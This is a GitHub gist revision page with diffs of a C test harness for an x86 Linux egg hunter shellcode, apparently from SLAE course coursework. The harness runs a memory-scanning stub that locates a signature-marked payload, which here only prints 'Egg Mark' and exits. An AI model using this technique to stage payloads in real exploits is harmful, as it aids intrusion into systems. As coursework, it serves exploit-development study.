Last active
December 3, 2021 19:59
-
-
Save geyslan/5254424 to your computer and use it in GitHub Desktop.
Revisions
-
geyslan revised this gist
May 26, 2018 . No changes.There are no files selected for viewing
-
Apr 22, 2013 . 1 changed file with 10 additions and 6 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -7,7 +7,9 @@ unsigned char egg[] = \ // Write "Egg Mark" and exit "\x90\x50\x90\x50" // <- First Four Bytes of Signature "\x90\x50\x90\x50" // <- Same first bytes are mandatory (Repeat them) "\x31\xdb" "\xf7\xe3\xb0\x04\x6a\x0a\x68\x4d\x61\x72" "\x6b\x68\x45\x67\x67\x20\xb3\x01\x89\xe1" "\xb2\x09\xcd\x80\xb0\x01\xcd\x80"; @@ -16,10 +18,12 @@ unsigned char egghunter[] = \ // Search for the Egg Signature (0x50905090 x 2) - the Egg's 8 first instructions (nop, push eax, nop, push eax...) "\xfc\x31\xc9\xf7\xe1\x66\x81\xca\xff\x0f" "\x42\x6a\x21\x58\x8d\x5a\x04\xcd\x80\x3c" "\xf2\x74\xee\xb8" "\x90\x50\x90\x50" // <- Signature "\x89\xd7\xaf\x75\xe9\xaf\x75\xe6\xff\xe7"; main () { @@ -40,7 +44,7 @@ main () // Setting the egg hunter signature to search (byte reverse order) "movl $0x50905090, (egghunter+24)\n\t" // Calling the shellcode "call egghunter"); -
Mar 27, 2013 . 1 changed file with 0 additions and 0 deletions.There are no files selected for viewing
File renamed without changes. -
Mar 27, 2013 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,48 @@ // This is a snippet of the original file in https://github.com/geyslan/SLAE/blob/master/3rd.assignment/egg_hunter_shellcode.c #include <stdio.h> #include <string.h> unsigned char egg[] = \ // Write "Egg Mark" and exit "\x90\x50\x90\x50\x90\x50\x90\x50\x31\xdb" "\xf7\xe3\xb0\x04\x6a\x0a\x68\x4d\x61\x72" "\x6b\x68\x45\x67\x67\x20\xb3\x01\x89\xe1" "\xb2\x09\xcd\x80\xb0\x01\xcd\x80"; unsigned char egghunter[] = \ // Search for the Egg Signature (0x50905090 x 2) - the Egg's 8 first instructions (nop, push eax, nop, push eax...) "\xfc\x31\xf6\xf7\xe6\x66\x81\xca\xff\x0f" "\x42\x6a\x21\x58\x8d\x5a\x04\x56\x59\xcd" "\x80\x3c\xf2\x74\xec\xb8\x90\x50\x90\x50" "\x89\xd7\xaf\x75\xe7\xaf\x75\xe4\xff\xe7"; main () { // When contains null bytes, printf will show a wrong shellcode length. printf("Shellcode Length: %d\n", strlen(egghunter)); // Pollutes all registers ensuring that the shellcode runs in any circumstance. __asm__ ("movl $0xffffffff, %eax\n\t" "movl %eax, %ebx\n\t" "movl %eax, %ecx\n\t" "movl %eax, %edx\n\t" "movl %eax, %esi\n\t" "movl %eax, %edi\n\t" "movl %eax, %ebp\n\t" // Setting the egg hunter signature to search (byte reverse order) "movl $0x50905090, (egghunter+26)\n\t" // Calling the shellcode "call egghunter"); }